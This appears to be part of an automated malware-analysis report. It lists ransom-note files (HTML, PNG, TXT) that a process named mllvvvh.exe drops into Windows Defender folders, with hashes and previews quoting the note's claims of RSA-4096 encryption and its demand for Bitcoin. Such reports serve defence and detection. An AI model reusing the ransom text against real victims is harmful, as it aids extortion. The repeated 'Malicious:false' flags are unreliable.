                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\CacheManager\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\CacheManager\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\ReportLatency\Latency\19\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\ReportLatency\Latency\19\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\ReportLatency\Latency\19\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\ReportLatency\Latency\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\ReportLatency\Latency\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\ReportLatency\Latency\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\ReportLatency\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\ReportLatency\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\ReportLatency\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\Resource\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\Results\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
